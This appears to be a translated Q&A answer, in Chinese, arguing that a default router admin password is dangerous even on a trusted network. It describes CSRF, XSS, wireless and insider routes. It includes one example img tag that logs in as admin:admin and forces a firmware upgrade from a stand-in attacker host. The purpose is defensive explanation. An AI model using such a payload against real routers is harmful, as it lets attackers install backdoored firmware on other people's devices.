如果网络上只允许受信任的用户,使用默认路由器管理员密码是否危险?
是的,这很危险。这里有一些更“技术”的方法(除了说它不好):
1.没有CSRF保护
您可能会愉快地访问一个网站,但它可能存在许多问题:
该网站本身已被滥用并插入了恶意内容,或者;
页面上的任何元素都在中间被 MITM 攻击(闭嘴,我想搞笑)并且有元素被 The Thing(tm) 拦截,并且;
CSRF 攻击是通过样式、img、链接或其他任何内容插入的:
粗略的例子:
<img src="http://admin:admin@192.168.0.1/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>
在许多情况下,如果您可以通过这样的链接使用 admin:admin@routerip 登录,CSRF 保护将无济于事。它将为您创建一个新的会话和令牌,而不是使用您当前的会话和令牌。
恭喜您最新安装了具有完整 shell 访问权限的 Router Backdoor(tm)。
2. CSRF 保护存在,但没有适当的 XSS 保护
转义上下文并插入hax.js
,或者只是可以执行以下功能的 JS 代码:
- 使用 javascript 窃取 CSRF 令牌
- 见
<img src=""/>
上文。
此外,.svg
图像可以绕过很多 XSS 保护。
3. 可以通过无线网络访问路由器配置页面吗?
有人登录您的无线网络,访问路由器配置页面并进行必要的更改/升级固件/重定向 DNS/他们想要的任何东西。与第一个类似,但使用的是点击式界面。
4.其他方式
- 心怀不满的员工
- 如果有人通过另一台受感染的机器在您的网络上找到了自己的出路,他们可以使用该机器破坏您的路由器,然后您就完蛋了。
请记住,如果供应商很垃圾,XSS/CSRF 攻击可能存在,甚至在升级期间添加。
所以不要这样做。请。我的心受不了。:(